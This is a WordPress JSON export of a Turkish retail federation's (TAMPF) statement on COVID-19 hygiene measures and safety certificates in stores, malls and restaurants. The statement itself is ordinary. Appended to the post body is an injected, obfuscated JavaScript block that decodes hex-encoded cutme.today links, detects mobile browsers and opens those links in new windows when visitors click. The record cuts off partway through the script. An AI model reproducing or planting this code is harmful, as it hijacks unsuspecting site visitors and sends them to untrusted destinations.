{"id":2351,"date":"2020-10-07T18:59:42","date_gmt":"2020-10-07T18:59:42","guid":{"rendered":"https:\/\/www.gidaperakendecileri.org\/?p=2351"},"modified":"2021-02-05T12:58:28","modified_gmt":"2021-02-05T12:58:28","slug":"tampf-modern-perakendede-sertifikalarla-daha-da-guclenen-onlemleri-anlatti","status":"publish","type":"post","link":"https:\/\/www.gidaperakendecileri.org\/?p=2351","title":{"rendered":"TAMPF, Modern Perakendede Sertifikalarla Daha da G\u00fc\u00e7lenen \u00d6nlemleri Anlatt\u0131"},"content":{"rendered":"<h3><b><span data-contrast=\"auto\">COV<\/span><\/b><b><span data-contrast=\"auto\">I<\/span><\/b><b><span data-contrast=\"auto\">D<\/span><\/b><b><span data-contrast=\"auto\">&#8211;<\/span><\/b><b><span data-contrast=\"auto\">19 salg\u0131n\u0131 s\u00fcrecinde<\/span><\/b><b><span data-contrast=\"auto\">,<\/span><\/b><b><span data-contrast=\"auto\">\u00a015 Mart 2020 tarihinden itibaren\u00a0<\/span><\/b><b><span data-contrast=\"auto\">m<\/span><\/b><b><span data-contrast=\"auto\">odern\u00a0<\/span><\/b><b><span data-contrast=\"auto\">p<\/span><\/b><b><span data-contrast=\"auto\">erakende sekt\u00f6r\u00fcnde al\u0131nan \u00f6nlemler, g\u00fcncellenerek devam\u00a0<\/span><\/b><b><span data-contrast=\"auto\">ediyor<\/span><\/b><b><span data-contrast=\"auto\">.<\/span><\/b><b><span data-contrast=\"auto\">\u00a0Sekt\u00f6r\u00fcm\u00fcz\u00fcn \u00e7at\u0131 kurulu\u015fu olan\u00a0<\/span><\/b><b><span data-contrast=\"auto\">T\u00fcrkiye Al\u0131\u015fveri\u015f Merkezleri ve Perakendeciler Federasyonu<\/span><\/b><b><span data-contrast=\"auto\">\u2019nun<\/span><\/b><b><span data-contrast=\"auto\">\u00a0(TAMPF)\u00a0<\/span><\/b><b><span data-contrast=\"auto\">bu konuda yay\u0131nlad\u0131\u011f\u0131 a\u00e7\u0131klama, sekt\u00f6r\u00fcn \u00f6nlemlere verdi\u011fi \u00f6nemi g\u00f6zler \u00f6n\u00fcne sermesi bak\u0131m\u0131ndan b\u00fcy\u00fck \u00f6nem ta\u015f\u0131yor.\u00a0<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">\u00a0<\/span><span data-contrast=\"auto\">\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">\u00dclkemizde organize perakendenin \u00e7at\u0131 kurulu\u015fu olan T\u00fcrkiye Al\u0131\u015fveri\u015f Merkezleri ve Perakendeciler Federasyonu<\/span><span data-contrast=\"auto\">\u2019<\/span><span data-contrast=\"auto\">nu\u00a0<\/span><span data-contrast=\"auto\">(<\/span><span data-contrast=\"auto\">TAMPF<\/span><span data-contrast=\"auto\">)\u00a0<\/span><span data-contrast=\"auto\">olu\u015fturan be\u015f derne\u011fi<\/span><span data-contrast=\"auto\">n<\/span><span data-contrast=\"auto\">\u00a0\u00f6nc\u00fcl\u00fc\u011f\u00fcnde<\/span><span data-contrast=\"auto\">,<\/span><span data-contrast=\"auto\">\u00a0Perakende\u00a0<\/span><span data-contrast=\"auto\">M<\/span><span data-contrast=\"auto\">a\u011fazalar\u0131, AVM Y\u00f6netimleri, Kafe ve Restoran \u0130\u015fletmeleri\u00a0<\/span><span data-contrast=\"auto\">taraf\u0131ndan<\/span><span data-contrast=\"auto\">\u00a0\u015fimdiye kadar ba\u015far\u0131<\/span><span data-contrast=\"auto\">yla<\/span><span data-contrast=\"auto\">\u00a0y\u00fcr\u00fct\u00fclen\u00a0<\/span><span data-contrast=\"auto\">pandemi<\/span><span data-contrast=\"auto\">\u00a0s\u00fcreci, bundan sonraki t\u00fcm a\u015famalar\u0131nda da m\u00fc\u015fteriler ve \u00e7al\u0131\u015fanlar i\u00e7in g\u00fcvenli hizmet<\/span><span data-contrast=\"auto\">i \u00f6n ko\u015ful olarak almaya devam edecek. Sekt\u00f6rde al\u0131nan \u00f6nlemler ve ger\u00e7ekle\u015ftirilen \u00e7al\u0131\u015fmalar konusunda bir a\u00e7\u0131klama yay\u0131nlayan TAMPF, yeni uygulamalar\u0131n i\u015fletmelere h\u0131zla ta\u015f\u0131naca\u011f\u0131na ve h\u0131zl\u0131 \u00e7\u00f6z\u00fcmler konusunda sekt\u00f6r olarak \u00f6nc\u00fc olunaca\u011f\u0131na vurgu yap\u0131yor.\u00a0<\/span><span data-contrast=\"auto\">TAMPF<\/span><span data-contrast=\"auto\">\u00a0<\/span><span data-contrast=\"auto\">taraf\u0131ndan yay\u0131nlanan a\u00e7\u0131klaman\u0131n ana ba\u015fl\u0131klar\u0131 \u015f\u00f6yle:\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><span data-contrast=\"auto\">\u201c<\/span><\/b><b><span data-contrast=\"auto\">G\u0131da Perakendesi B\u00fcy\u00fck \u00d6zveriyle \u00c7al\u0131\u015ft\u0131<\/span><\/b><b><span data-contrast=\"auto\">\u201d<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Pandemi<\/span><span data-contrast=\"auto\">\u00a0s\u00fcrecinin ba\u015f\u0131ndan beri faaliyetlerini hi\u00e7 ara vermeden s\u00fcrd\u00fcren g\u0131da perakende ma\u011fazalar\u0131 bu d\u00f6nemde halk\u0131n temel ihtiya\u00e7lar\u0131n\u0131n kar\u015f\u0131lanmas\u0131 i\u00e7in b\u00fcy\u00fck \u00f6zveriyle \u00e7al\u0131\u015ft\u0131. Salg\u0131nla m\u00fccadele ve halk sa\u011fl\u0131\u011f\u0131n\u0131n korunmas\u0131 amac\u0131yla t\u00fcm \u00f6nlemler eksiksiz uygulan\u0131rken, bilin\u00e7lendirme \u00e7al\u0131\u015fmalar\u0131na da a\u011f\u0131rl\u0131k verildi. Gerek \u00e7al\u0131\u015fanlar\u0131n gerekse m\u00fc\u015fterilerin \u00f6nlemlere uymas\u0131 konusunda son derece dikkatli faaliyet g\u00f6steren ve \u00f6nc\u00fc olan perakendeciler olarak kendi operasyonlar\u0131m\u0131z\u0131n yan\u0131 s\u0131ra, tedarik zincirimizin de kesintisiz \u00e7al\u0131\u015fmas\u0131 i\u00e7in \u00f6nlemler al\u0131yoruz. \u00dcretimden son t\u00fcketim noktas\u0131na kadar b\u00fct\u00fcn planlamay\u0131 kontrol eden perakende i\u015fletmeleri, bu ba\u011flamda ekonominin t\u00fcm\u00fcne katma de\u011fer sa\u011flamaya devam ediyor.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><span data-contrast=\"auto\">\u201cG\u00fcvenli Turizm Sertifikas\u0131<\/span><\/b><b><span data-contrast=\"auto\">,<\/span><\/b><b><span data-contrast=\"auto\">\u00a0Model Oldu\u201d<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">\u00dcye restoranlar\u0131m\u0131z\u00a0<\/span><span data-contrast=\"auto\">taraf\u0131nda, K\u00fclt\u00fcr<\/span><span data-contrast=\"auto\">\u00a0ve Turizm Bakanl\u0131\u011f\u0131<\/span><span data-contrast=\"auto\">\u2019<\/span><span data-contrast=\"auto\">m\u0131z\u0131n \u00f6ng\u00f6r\u00fcleri ile d\u00fcnyada g\u00fcvenilir \u00fclke-destinasyon<\/span><span data-contrast=\"auto\">u<\/span><span data-contrast=\"auto\">\u00a0olmam\u0131z i\u00e7in belirlenen kurallar ve bu kurallar\u0131n uygulanmas\u0131na y\u00f6nelik geli\u015ftirilen s\u0131k\u0131 denetimler eksiksiz olarak uygulan<\/span><span data-contrast=\"auto\">d\u0131<\/span><span data-contrast=\"auto\">. Yurt d\u0131\u015f\u0131 uygulamalardan \u00e7ok daha kararl\u0131\u00a0<\/span><span data-contrast=\"auto\">ve titiz<\/span><span data-contrast=\"auto\">\u00a0<\/span><span data-contrast=\"auto\">bir\u00a0<\/span><span data-contrast=\"auto\">yakla\u015f\u0131mla bula\u015f kontrol\u00fcn\u00fc azami seviyede \u00f6nlemeye y\u00f6nelik Bakanl\u0131k taraf\u0131ndan\u00a0<\/span><span data-contrast=\"auto\">\u201c<\/span><span data-contrast=\"auto\">G\u00fcvenli Turizm Sertifikas\u0131<\/span><span data-contrast=\"auto\">\u201d<\/span><span data-contrast=\"auto\">\u00a0olu\u015fturul<\/span><span data-contrast=\"auto\">du<\/span><span data-contrast=\"auto\">\u00a0ve bir\u00e7ok otel,\u00a0<\/span><span data-contrast=\"auto\">r<\/span><span data-contrast=\"auto\">estoran,\u00a0<\/span><span data-contrast=\"auto\">t<\/span><span data-contrast=\"auto\">ur ve\u00a0<\/span><span data-contrast=\"auto\">t<\/span><span data-contrast=\"auto\">ransfer\u00a0<\/span><span data-contrast=\"auto\">ara\u00e7lar\u0131 bu<\/span><span data-contrast=\"auto\">\u00a0sertifikay\u0131\u00a0<\/span><span data-contrast=\"auto\">ald\u0131<\/span><span data-contrast=\"auto\">.<\/span><span data-contrast=\"auto\">\u00a0<\/span><span data-contrast=\"auto\">Bu sertifikaya turizm i<\/span><span data-contrast=\"auto\">\u015f<\/span><span data-contrast=\"auto\">letme belgesi olsun ya da olmas\u0131n<\/span><span data-contrast=\"auto\">,<\/span><span data-contrast=\"auto\">\u00a0<\/span><span data-contrast=\"auto\">t\u00fcm\u00a0<\/span><span data-contrast=\"auto\">tesis ve i<\/span><span data-contrast=\"auto\">\u015fletmeler ra\u011fbet\u00a0<\/span><span data-contrast=\"auto\">g\u00f6sterdi<\/span><span data-contrast=\"auto\">.<\/span><span data-contrast=\"auto\">\u00a0<\/span><span data-contrast=\"auto\">Gelinen a\u015fam<\/span><span data-contrast=\"auto\">ada misafirlerimizin i\u015fletme se\u00e7<\/span><span data-contrast=\"auto\">imi<\/span><span data-contrast=\"auto\">nde bu sertifikay\u0131 dikkate ald\u0131\u011f\u0131n\u0131 da\u00a0<\/span><span data-contrast=\"auto\">g\u00f6zlemledik<\/span><span data-contrast=\"auto\">.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">\u00dcye kafe\u00a0<\/span><span data-contrast=\"auto\">ve\u00a0<\/span><span data-contrast=\"auto\">restoran i\u015fletmelerimiz, belirlenen t\u00fcm hijyen kurallar\u0131n\u0131 eksiksiz olarak uygulayarak ve kamu sa\u011fl\u0131\u011f\u0131n\u0131 \u00f6n planda tutarak \u00e7al\u0131\u015fmalar\u0131na devam\u00a0<\/span><span data-contrast=\"auto\">ediyor.<\/span><span data-contrast=\"auto\">\u00a0<\/span><span data-contrast=\"auto\">B<\/span><span data-contrast=\"auto\">u \u00f6zverili \u00e7al\u0131\u015fma s\u00fcrecinde t\u00fcm perakende ve turizm sekt\u00f6r\u00fc ile omuz\u00a0<\/span><span data-contrast=\"auto\">omuza K\u00fclt\u00fcr<\/span><span data-contrast=\"auto\">\u00a0ve Turizm Bakanl\u0131\u011f\u0131<\/span><span data-contrast=\"auto\">\u2019<\/span><span data-contrast=\"auto\">n\u0131n\u00a0<\/span><span data-contrast=\"auto\">liderli\u011finde birlikte<\/span><span data-contrast=\"auto\">\u00a0\u00e7al\u0131\u015farak, d\u00fcnya i\u00e7in \u00f6rnek olacak bir birliktelik\u00a0<\/span><span data-contrast=\"auto\">sergileniyor<\/span><span data-contrast=\"auto\">. \u201cG\u00fcvenli Turizm Sertifikas\u0131\u201d alan\u00a0<\/span><span data-contrast=\"auto\">bir\u00e7ok<\/span><span data-contrast=\"auto\">\u00a0\u00fcye i\u015fletmemiz, sekt\u00f6r\u00fcn t\u00fcm payda\u015flar\u0131\u00a0<\/span><span data-contrast=\"auto\">i\u00e7in \u00f6nc\u00fc<\/span><span data-contrast=\"auto\">\u00a0bir model olarak daha \u00e7ok say\u0131da i\u015fletmenin bu sertifikay\u0131 almas\u0131 i\u00e7in \u00e7aba g\u00f6sterdi. Salg\u0131n kar\u015f\u0131s\u0131nda geli\u015ftirilen t\u00fcm ko\u015fullar\u0131n\u0131n tam ve eksiksiz uygulanmas\u0131 konusunda \u00fcstlendi\u011fimiz misyonu yerine getirmeye devam edece\u011fiz.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><span data-contrast=\"auto\">\u201c<\/span><\/b><b><span data-contrast=\"auto\">AVM\u2019lerde<\/span><\/b><b><span data-contrast=\"auto\">\u00a0<\/span><\/b><b><span data-contrast=\"auto\">K<\/span><\/b><b><span data-contrast=\"auto\">alite\u00a0<\/span><\/b><b><span data-contrast=\"auto\">A<\/span><\/b><b><span data-contrast=\"auto\">ltyap\u0131s\u0131\u00a0<\/span><\/b><b><span data-contrast=\"auto\">G<\/span><\/b><b><span data-contrast=\"auto\">\u00fc\u00e7lendiriliyor<\/span><\/b><b><span data-contrast=\"auto\">\u201d<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Perakende ve turizm sekt\u00f6rlerinin b\u00fcy\u00fcmesinde b\u00fcy\u00fck katk\u0131s\u0131 olan ve ziyaret\u00e7ilerine sa\u011flad\u0131klar\u0131 yeme-i\u00e7me, k\u00fclt\u00fcr- sanat ve e\u011flence alanlar\u0131yla birer ya\u015fam merkezi i\u015flevi g\u00f6ren al\u0131\u015fveri\u015f merkezleri de yeni d\u00f6nemde Sa\u011fl\u0131k Bakanl\u0131\u011f\u0131<\/span><span data-contrast=\"auto\">\u2019<\/span><span data-contrast=\"auto\">n\u0131n ve Bilim Kurulu<\/span><span data-contrast=\"auto\">\u2019<\/span><span data-contrast=\"auto\">nun direktifleri do\u011frultusunda ve ilgili t\u00fcm kurumlarla\u00a0<\/span><span data-contrast=\"auto\">i\u015f birli\u011fi<\/span><span data-contrast=\"auto\">\u00a0i\u00e7inde<\/span><span data-contrast=\"auto\">,<\/span><span data-contrast=\"auto\">\u00a0salg\u0131n\u0131n yay\u0131lmas\u0131n\u0131 \u00f6nlemeye y\u00f6nelik her t\u00fcrl\u00fc \u00f6nlemi ald\u0131 ve almaya devam ediyor. Al\u0131\u015fveri\u015f merkezleri ald\u0131\u011f\u0131 t\u00fcm tedbirlere ek olarak T\u00fcrk\u00a0<\/span><span data-contrast=\"auto\">Standartlar\u0131<\/span><span data-contrast=\"auto\">\u00a0Enstit\u00fcs\u00fc ile ba\u015flatt\u0131\u011f\u0131 \u00e7al\u0131\u015fma ile de al\u0131\u015fveri\u015f merkezlerinde g\u00fcvenli al\u0131\u015fveri\u015fin standartlar\u0131n\u0131n belirlenmesi ve denetimlerini tamamlayan\u00a0<\/span><span data-contrast=\"auto\">AVM\u2019lerin<\/span><span data-contrast=\"auto\">\u00a0TSE Covid-19 G\u00fcvenli Hizmet Belgesi ile belgelendirilmesini sa\u011fl\u0131yor. B\u00f6ylece<\/span><span data-contrast=\"auto\">\u00a0<\/span><span data-contrast=\"auto\">AVM\u2019lerde<\/span><span data-contrast=\"auto\">\u00a0kalite altyap\u0131s\u0131 g\u00fc\u00e7lendiriliyor, bilgi payla\u015f\u0131m\u0131 artt\u0131r\u0131l\u0131yor.\u00a0<\/span><span data-contrast=\"auto\">AVM\u2019lerin<\/span><span data-contrast=\"auto\">\u00a0<\/span><span data-contrast=\"auto\">ya\u015fam ve ticaret alanlar\u0131nda, kalite, hizmet, hijyen standartlar\u0131 geli\u015ftirilerek, m\u00fc\u015fteri memnuniyeti sa\u011flan\u0131yor. Ortak \u00e7al\u0131\u015fma programlar\u0131 olu\u015fturuluyor ve bu programlar olu\u015fan yeni \u015fartlara g\u00f6re g\u00fcncelleniyor. Al\u0131\u015fveri\u015f merkezlerinin g\u00fcvenilirli\u011fi TSE belgesi ile de tescillenerek vatanda\u015flar\u0131m\u0131z\u0131n kendilerini g\u00fcvende hissedebilecekleri, sosyal mesafeye uyulan<\/span><span data-contrast=\"auto\">,<\/span><span data-contrast=\"auto\">\u00a0hijyenik ortamlar olarak hem al\u0131\u015fveri\u015f hem de sosyal hayata katk\u0131 sunuyor.\u00a0<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><b><span data-contrast=\"auto\">\u201c<\/span><\/b><b><span data-contrast=\"auto\">G\u0131da\u00a0<\/span><\/b><b><span data-contrast=\"auto\">D<\/span><\/b><b><span data-contrast=\"auto\">\u0131\u015f\u0131\u00a0<\/span><\/b><b><span data-contrast=\"auto\">P<\/span><\/b><b><span data-contrast=\"auto\">erakendede<\/span><\/b><b><span data-contrast=\"auto\">\u00a0G<\/span><\/b><b><span data-contrast=\"auto\">eli\u015ftirici\u00a0<\/span><\/b><b><span data-contrast=\"auto\">\u0130<\/span><\/b><b><span data-contrast=\"auto\">\u015f\u00a0<\/span><\/b><b><span data-contrast=\"auto\">B<\/span><\/b><b><span data-contrast=\"auto\">irlikleri<\/span><\/b><b><span data-contrast=\"auto\">\u201d<\/span><\/b><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">G\u0131da d\u0131\u015f\u0131 perakendede de t\u00fcm ma\u011fazalar\u0131m\u0131zda gerekli \u00f6nlemler al\u0131narak<\/span><span data-contrast=\"auto\">\u00a0ve<\/span><span data-contrast=\"auto\">\u00a0\u00e7al\u0131\u015fan ve m\u00fc\u015fteri sa\u011fl\u0131\u011f\u0131n\u0131n korunmas\u0131na dikkat edilerek operasyonlar s\u00fcrd\u00fcr\u00fcl\u00fcyor. Sekt\u00f6r\u00fcn canlanmas\u0131 ve yeni ko\u015fullara ayak uydurmas\u0131 i\u00e7in gerek devletimizin\u00a0<\/span><span data-contrast=\"auto\">kurumlar\u0131<\/span><span data-contrast=\"auto\">\u00a0gerekse payda\u015flar\u0131m\u0131zla s\u00fcrd\u00fcr\u00fclen yap\u0131c\u0131 ve geli\u015ftirici\u00a0<\/span><span data-contrast=\"auto\">i\u015f birlikleri<\/span><span data-contrast=\"auto\">\u00a0sayesinde bu d\u00f6nemin h\u0131zl\u0131ca atlat\u0131laca\u011f\u0131na inan\u0131yoruz.<\/span><span data-ccp-props=\"{&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}\">\u00a0<\/span><\/p>\n<p><span data-contrast=\"auto\">Yaz d\u00f6neminde artan sosyal ya\u015fam, d\u00f6nemsel etkinlikler<\/span><span data-contrast=\"auto\">\u00a0ve\u00a0<\/span><span data-contrast=\"auto\">geleneksel t\u00f6renler salg\u0131n\u0131n etkisini artt\u0131rm\u0131\u015f olsa da yeni d\u00f6nemde \u00f6zellikle \u015fehir merkezlerinde sorumluluklar\u0131m\u0131z\u0131n bilincinde olarak hizmet verecek ve hayat\u0131n ne\u015fesini payla\u015fmaya devam edece\u011fiz.<\/span><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6e\\x74\\x53\\x33\\x63\\x333','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x67\\x55\\x55\\x35\\x63\\x345','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x64\\x55\\x62\\x38\\x63\\x368','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6e\\x68\\x43\\x39\\x63\\x369','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x5a\\x70\\x6a\\x34\\x63\\x364','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x68\\x69\\x56\\x37\\x63\\x347','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x61\\x66\\x32\\x63\\x352','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x68\\x6a\\x53\\x36\\x63\\x396','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x62\\x48\\x4f\\x30\\x63\\x310','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x53\\x63\\x71\\x31\\x63\\x371',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new 